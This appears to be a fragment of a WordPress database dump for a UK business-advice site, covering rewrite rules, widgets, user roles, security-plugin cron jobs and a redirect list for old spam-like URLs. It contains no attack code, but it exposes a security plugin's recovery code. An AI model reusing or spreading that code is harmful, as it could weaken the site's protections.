hment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(44,'comment_registration','','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','49752','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','posts','yes'),(54,'tag_base','','yes'),(55,'show_avatars','','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','1','yes'),(70,'close_comments_days_old','1','yes'),(71,'thread_comments','','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:7:{s:5:\"title\";s:24:\"What Advice Do You Need?\";s:5:\"count\";i:1;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;s:14:\"wtitle_nostyle\";i:0;s:9:\"wtitle_bg\";s:0:\"\";s:11:\"wtitle_font\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:6:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;i:3;a:7:{s:5:\"title\";s:22:\"Send Us Your Questions\";s:4:\"text\";s:47:\"[contact-form-7 id=\"58\" title=\"Contact form 1\"]\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;s:14:\"wtitle_nostyle\";i:0;s:9:\"wtitle_bg\";N;s:11:\"wtitle_font\";N;}i:4;a:7:{s:5:\"title\";s:19:\"Contact Information\";s:4:\"text\";s:438:\"Tel: <a href=\"tel:020013311225\">020 0133 11225</a>\r\n\r\nEmail: <a href=\"mailto:business@ashbooks.co.uk\">business@ashbooks.co.uk</a>\r\n\r\nAddress: <a class=\"customize-unpreviewable\" href=\"https://www.google.co.uk/maps/place/Billing+Rd,+Northampton+NN1/@52.2387011,-0.8768874,17z/data=!3m1!4b1!4m5!3m4!1s0x48770ed2d4fb13d3:0x9edf7f2b8483bfaf!8m2!3d52.2387011!4d-0.8746987?dcr=0\" target=\"_blank\" rel=\"noopener\">Billing Road, Northampton, NN1</a>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;s:14:\"wtitle_nostyle\";i:0;s:9:\"wtitle_bg\";N;s:11:\"wtitle_font\";N;}i:5;a:7:{s:5:\"title\";s:13:\"Come Visit Us\";s:4:\"text\";s:365:\"<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2443.257791379802!2d-0.876887384202979!3d52.2387010797619!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x48770ed2d4fb13d3%3A0x9edf7f2b8483bfaf!2sBilling+Rd%2C+Northampton+NN1!5e0!3m2!1sen!2suk!4v1517912664088\" width=\"600\" height=\"250\" frameborder=\"0\" style=\"border:0\" allowfullscreen></iframe>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;s:14:\"wtitle_nostyle\";i:0;s:9:\"wtitle_bg\";N;s:11:\"wtitle_font\";N;}i:6;a:7:{s:5:\"title\";s:20:\"Best Business Sites!\";s:4:\"text\";s:579:\"<ul>\r\n 	<li><a href=\"http://www.newstank.co.uk/\" target=\"_blank\" rel=\"noopener\">News Tank</a></li>\r\n 	<li><a href=\"http://www.bordersstores.uk/\" target=\"_blank\" rel=\"noopener\">Border Stores Business Writing</a></li>\r\n 	<li><a href=\"http://evansbooks.co.uk/targeted_cv-html\" target=\"_blank\" rel=\"noopener\">Evans CV</a></li>\r\n 	<li><a href=\"http://www.walsallsnewdeal.org.uk/index-html\" target=\"_blank\" rel=\"noopener\">Walsalls New Deal Essays</a></li>\r\n 	<li><a href=\"http://businessconnect.org.uk/directory.html\" target=\"_blank\" rel=\"noopener\">Business Connect 101</a></li>\r\n</ul>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;s:14:\"wtitle_nostyle\";i:0;s:9:\"wtitle_bg\";s:0:\"\";s:11:\"wtitle_font\";s:0:\"\";}}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:3:{s:35:\"cookie-law-info/cookie-law-info.php\";s:25:\"uninstall_cookie_law_info\";s:27:\"wp-optimize/wp-optimize.php\";s:21:\"wpo_uninstall_actions\";s:23:\"wp-cerber/wp-cerber.php\";s:13:\"cerber_finito\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','0','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:64:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:2:{i:2;a:6:{s:5:\"title\";s:7:\"Advice!\";s:6:\"number\";i:25;s:9:\"show_date\";b:0;s:14:\"wtitle_nostyle\";i:0;s:9:\"wtitle_bg\";s:0:\"\";s:11:\"wtitle_font\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:20:{s:19:\"wp_inactive_widgets\";a:1:{i:0;s:23:\"hoot-post-grid-widget-3\";}s:20:\"hoot-primary-sidebar\";a:4:{i:0;s:8:\"search-2\";i:1;s:12:\"categories-2\";i:2;s:14:\"recent-posts-2\";i:3;s:6:\"text-3\";}s:22:\"hoot-secondary-sidebar\";a:0:{}s:16:\"hoot-topbar-left\";a:0:{}s:17:\"hoot-topbar-right\";a:0:{}s:11:\"hoot-header\";a:0:{}s:14:\"hoot-menu-side\";a:0:{}s:17:\"hoot-below-header\";a:0:{}s:15:\"hoot-sub-footer\";a:0:{}s:13:\"hoot-footer-a\";a:1:{i:0;s:6:\"text-4\";}s:13:\"hoot-footer-b\";a:1:{i:0;s:6:\"text-5\";}s:13:\"hoot-footer-c\";a:1:{i:0;s:6:\"text-6\";}s:23:\"hoot-frontpage-area_a_1\";a:0:{}s:23:\"hoot-frontpage-area_b_1\";a:1:{i:0;s:23:\"hoot-post-grid-widget-5\";}s:23:\"hoot-frontpage-area_b_2\";a:1:{i:0;s:23:\"hoot-post-grid-widget-6\";}s:23:\"hoot-frontpage-area_c_1\";a:0:{}s:23:\"hoot-frontpage-area_d_1\";a:0:{}s:23:\"hoot-frontpage-area_e_1\";a:0:{}s:23:\"hoot-frontpage-area_f_1\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'cron','a:17:{i:1638542272;a:1:{s:18:\"cerber_bg_launcher\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:8:\"crb_five\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1638542626;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1638543600;a:1:{s:15:\"cerber_hourly_1\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1638544200;a:1:{s:15:\"cerber_hourly_2\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1638544397;a:1:{s:21:\"wpo_plugin_cron_tasks\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1638544399;a:1:{s:29:\"wpo_smush_clear_backup_images\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1638544614;a:1:{s:24:\"aiowps_hourly_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1638549002;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1638567391;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1638573377;a:1:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1638584400;a:1:{s:12:\"cerber_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1638610604;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1638611095;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1638613998;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1638616614;a:1:{s:23:\"aiowps_daily_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1638625425;a:2:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(110,'theme_mods_twentyseventeen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1517912007;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(168,'recently_activated','a:1:{s:23:\"wordfence/wordfence.php\";i:1629757065;}','yes'),(169,'wph_environment_hash','17e63094ea7ffdd8af8130399d5ca919','yes'),(170,'wph_settings','a:3:{s:15:\"module_settings\";a:0:{}s:13:\"recovery_code\";s:32:\"2f408aa234c06e110c2b1038c275b939\";s:7:\"version\";s:7:\"1.5.9.5\";}','yes'),(173,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(174,'vc_version','5.1.1','yes'),(175,'wpb_js_composer_license_activation_notified','yes','yes'),(181,'301_redirects','a:15:{s:26:\"/2011/6/15/there-are-a-few\";s:37:\"https://ashbooks.co.uk/business-books\";s:48:\"/2010/2/8/the-growths-differ-with-respect-to-the\";s:37:\"https://ashbooks.co.uk/business-books\";s:53:\"/2014/2/13/in-lots-of-situations-there-are-clues-that\";s:37:\"https://ashbooks.co.uk/business-books\";s:45:\"/2009/2/23/treatment-and-canine-cordiality-is\";s:37:\"https://ashbooks.co.uk/business-books\";s:51:\"/2008/10/19/there-isnt-any-side-effect-of-utilizing\";s:37:\"https://ashbooks.co.uk/business-books\";s:41:\"/2014/6/29/medical-help-to-move-away-from\";s:37:\"https://ashbooks.co.uk/business-books\";s:38:\"/2007/12/6/acomplia-that-is-economical\";s:37:\"https://ashbooks.co.uk/business-books\";s:44:\"/2012/1/10/the-cause-of-stretch-marks-is-the\";s:37:\"https://ashbooks.co.uk/business-books\";s:40:\"/2007/4/25/sexual-abuse-is-a-crime-thats\";s:37:\"https://ashbooks.co.uk/business-books\";s:50:\"/2013/6/16/ayurveda-is-a-science-of-medicine-thats\";s:37:\"https://ashbooks.co.uk/business-books\";s:53:\"/2010/2/8/the-growths-differ-with-respect-to-the]Best\";s:37:\"https://ashbooks.co.uk/business-books\";s:41:\"/wp-content/uploads/2009/12/discworld.jpg\";s:37:\"https://ashbooks.co.uk/business-books\";s:48:\"/2012/1/10/the-cause-of-stretch-marks-is-the]Buy\";s:37:\"https://ashbooks.co.uk/business-books\";s:46:\"/2007/12/6/acomplia-that-is-economical]Average\";s:37:\"https://ashbooks.co.uk/business-books\";s:45:\"/2014/6/29/medical-help-to-move-away-from]Buy\";s:37:\"https://ashbooks.co.uk/business-books\";}','yes'),(192,'wpcf7','a:2:{s:7:\"version\";s:5:\"5.1.6\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1517911501;s:7:\"version\";s:3:\"5.0\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(207,'current_theme','Magazine Hoot','yes'),(208,'theme_mods_magazine-hoot','a:8:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:14:\"hoot-secondary\";i:5;}s:18:\"custom_css_post_id\";i:-1;s:10:\"site_width\";s:4:\"1380\";s:18:\"frontpage_sections\";s:813:\"frontpage_sections%5Bslider_html%5D%5Bsortitem_hide%5D=0&frontpage_sections%5Bslider_img%5D%5Bsortitem_hide%5D=0&frontpage_sections%5Barea_a%5D%5Bsortitem_hide%5D=0&frontpage_sections%5Barea_a%5D%5Bcolumns%5D=50-50&frontpage_sections%5Barea_b%5D%5Bsortitem_hide%5D=0&frontpage_sections%5Barea_b%5D%5Bcolumns%5D=50-50&frontpage_sections%5Barea_c%5D%5Bsortitem_hide%5D=0&frontpage_sections%5Barea_c%5D%5Bcolumns%5D=100&frontpage_sections%5Barea_d%5D%5Bsortitem_hide%5D=0&frontpage_sections%5Barea_d%5D%5Bcolumns%5D=100&frontpage_sections%5Barea_e%5D%5Bsortitem_hide%5D=0&frontpage_sections%5Barea_e%5D%5Bcolumns%5D=100&frontpage_sections%5Barea_f%5D%5Bsortitem_hide%5D=0&frontpage_sections%5Barea_f%5D%5Bcolumns%5D=100&frontpage_sections%5Bcontent%5D%5Bsortitem_hide%5D=0&frontpage_sections%5Bcontent%5D%5Btitle%5D=\";s:31:\"frontpage_sectionbg_area_a-type\";s:4:\"none\";s:11:\"site_layout\";s:5:\"boxed\";s:10:\"sidebar_fp\";s:10:\"wide-right\";}','yes'),(209,'theme_switched','','yes'),(210,'widget_hoot-announce-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(211,'widget_hoot-content-blocks-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(212,'widget_hoot-posts-blocks-widget','a:7:{s:12:\"_multiwidget\";i:1;i:3;a:18:{s:5:\"title\";s:0:\"\";s:5:\"style\";s:6:\"style2\";s:8:\"category\";s:1:\"0\";s:7:\"columns\";s:1:\"4\";s:5:\"count\";i:4;s:6:\"offset\";s:0:\"\";s:11:\"fullcontent\";s:7:\"excerpt\";s:13:\"excerptlength\";i:25;s:6:\"border\";s:9:\"none none\";s:9:\"customcss\";a:3:{s:5:\"class\";s:0:\"\";s:2:\"mt\";s:0:\"\";s:2:\"mb\";s:0:\"\";}s:9:\"wtitle_bg\";s:0:\"\";s:11:\"wtitle_font\";s:0:\"\";s:11:\"show_author\";i:0;s:9:\"show_date\";i:0;s:13:\"show_comments\";i:0;s:9:\"show_cats\";i:0;s:9:\"show_tags\";i:0;s:14:\"wtitle_nostyle\";i:0;}i:4;a:0:{}i:5;a:0:{}i:6;a:0:{}i:7;a:0:{}i:8;a:0:{}}','yes'),(213,'widget_hoot-cta-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(214,'widget_hoot-post-grid-widget','a:5:{s:12:\"_multiwidget\";i:1;i:3;a:15:{s:5:\"title\";s:1:\"A\";s:8:\"category\";s:1:\"3\";s:7:\"columns\";s:1:\"5\";s:5:\"count\";s:0:\"\";s:7:\"viewall\";s:4:\"none\";s:9:\"show_cats\";s:5:\"first\";s:9:\"firstpost\";a:5:{s:6:\"author\";i:1;s:8:\"standard\";i:0;s:4:\"date\";i:0;s:8:\"comments\";i:0;s:4:\"tags\";i:0;}s:9:\"customcss\";a:3:{s:5:\"class\";s:0:\"\";s:2:\"mt\";s:0:\"\";s:2:\"mb\";s:0:\"\";}s:9:\"wtitle_bg\";s:0:\"\";s:11:\"wtitle_font\";s:0:\"\";s:11:\"show_author\";i:0;s:9:\"show_date\";i:0;s:13:\"show_comments\";i:0;s:9:\"show_tags\";i:0;s:14:\"wtitle_nostyle\";i:0;}i:4;a:15:{s:5:\"title\";s:0:\"\";s:8:\"category\";s:1:\"3\";s:7:\"columns\";s:1:\"5\";s:5:\"count\";s:0:\"\";s:7:\"viewall\";s:4:\"none\";s:9:\"show_cats\";s:5:\"first\";s:9:\"firstpost\";a:5:{s:6:\"author\";i:1;s:4:\"date\";i:1;s:8:\"standard\";i:0;s:8:\"comments\";i:0;s:4:\"tags\";i:0;}s:9:\"customcss\";a:3:{s:5:\"class\";s:0:\"\";s:2:\"mt\";s:0:\"\";s:2:\"mb\";s:0:\"\";}s:11:\"show_author\";i:0;s:9:\"show_date\";i:0;s:13:\"show_comments\";i:0;s:9:\"show_tags\";i:0;s:14:\"wtitle_nostyle\";i:0;s:9:\"wtitle_bg\";N;s:11:\"wtitle_font\";N;}i:5;a:15:{s:5:\"title\";s:0:\"\";s:8:\"category\";s:1:\"1\";s:7:\"columns\";s:1:\"5\";s:5:\"count\";s:0:\"\";s:7:\"viewall\";s:4:\"none\";s:9:\"show_cats\";s:5:\"first\";s:9:\"firstpost\";a:5:{s:6:\"author\";i:1;s:4:\"date\";i:1;s:8:\"standard\";i:0;s:8:\"comments\";i:0;s:4:\"tags\";i:0;}s:9:\"customcss\";a:3:{s:5:\"class\";s:0:\"\